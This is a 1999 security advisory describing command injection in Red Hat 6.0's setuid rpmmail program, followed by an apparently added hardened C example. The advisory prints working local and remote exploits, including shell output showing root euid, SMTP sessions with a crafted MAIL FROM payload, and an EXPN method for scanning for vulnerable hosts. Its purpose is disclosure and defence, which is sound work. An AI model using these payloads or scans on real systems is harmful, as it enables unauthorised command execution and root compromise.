RH6_rpmmail_exploit.txt

05 Oct 1999 00:00:00 | Reported by Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

Vulnerability in rpmmail allows remote/local root access or command execution on Red Hat 6.0

Code
`Greetings,  
  
A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0  
Extra Applications CD. The potential compromise for this bug could be remote  
or local root or simply remote command execution as "nobody" or similar,   
depending on your system configuration.  
  
By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can  
get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)  
to system(3) any command you wish. The command executed does not necessarily  
have root privs because of bash's handling of euid != uid of caller. Although  
system(3) calls /bin/sh -c, it is linked by default (can anyone verify  
these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the   
system(3) man page:  
  
system() will not, in fact, work properly from programs   
with suid or sgid privileges on systems on which  
/bin/sh is bash version 2, since bash 2 drops privileges  
on startup. (Debian uses a modified bash which does not  
do this when invoked as sh.)  
  
Thus some systems with rpmmail installed are vulnerable to local/remote root,   
all others to remote command execution as an unpriv'd user.  
  
The local exploit is as follows:  
  
/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior):  
bash-2.03$ ls -la /bin/sh  
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash  
bash-2.03$ cat /etc/SuSE-release;uname -a;id  
SuSE Linux 6.2 (i386)  
VERSION = 6.2  
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown  
uid=100(xnec) gid=100(users) groups=100(users)  
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah  
Could not open config file!  
sh: Y: command not found  
uid=100(xnec) gid=100(users) groups=100(users)  
Could not open acknowledge file!  
bash-2.03$  
  
----  
  
After linking /bin/sh to /bin/ksh instead:  
  
bash-2.03$ ls -la /bin/sh  
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh  
bash-2.03$ cat /etc/SuSE-release;uname -a;id  
SuSE Linux 6.2 (i386)  
VERSION = 6.2  
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown  
uid=100(xnec) gid=100(users) groups=100(users)  
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah  
Could not open config file!  
sh: Y: not found  
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)  
Could not open acknowledge file!  
bash-2.03$  
  
  
  
The remote exploit is merely:  
bash-2.03$ telnet localhost 25  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500  
(CDT)  
MAIL FROM: ;/command/to/execute;  
250 <;/command/to/execute;> ... Sender Okay  
RCPT TO: rpmmail  
250 <rpmmail> ... Recipient Okay  
data  
354 Enter mail, end with "." on a line by itself  
.  
250 Mail accepted  
quit  
  
A remote scan of vulnerable hosts for this problem would be simple as well,   
since EXPN can be used to verify the existence of the .forward file:  
  
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500  
(CDT)  
EXPN rpmmail  
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"  
  
Brock Tellier  
UNIX Systems Administrator  
  
  
`
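
The root cause described in the advisory is a setuid program passing a sender address taken from the message to system(3). As an added example (not code from rpmmail or from the advisory), one hardened pattern in C: check the address against a strict allowlist, drop privileges, and exec the mailer directly so no shell ever parses the address. The function names `sender_is_safe` and `send_ack` and the `mailer` path argument are assumptions made for illustration.

```c
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check: local@domain built only from [A-Za-z0-9._+-]; returns 1 if ok. */
int sender_is_safe(const char *addr)
{
    size_t i, n, at = 0, ats = 0;

    if (addr == NULL || (n = strlen(addr)) == 0 || n > 254)
        return 0;
    if (addr[0] == '-')              /* would be read as an option by the mailer */
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (c == '@') { at = i; ats++; continue; }
        if (!isalnum(c) && c != '.' && c != '-' && c != '_' && c != '+')
            return 0;                /* rejects ; | & $ ` quotes, spaces, newlines */
    }
    return ats == 1 && at > 0 && at < n - 1;
}

/* Hypothetical helper: run `mailer` with the address as a single argv element.
 * Returns the mailer's exit status, or -1 if the address is rejected or on error. */
int send_ack(const char *mailer, const char *addr)
{
    pid_t pid;
    int status;

    if (!sender_is_safe(addr))
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)mailer, (char *)addr, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        /* Drop setgid/setuid privileges for good before running anything. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execve(mailer, argv, envp);  /* no /bin/sh -c, so nothing interprets ';' */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

With this pattern the `From: ;/usr/bin/id;` input shown in the advisory is rejected before any process is started, and the outcome no longer depends on which shell /bin/sh points to.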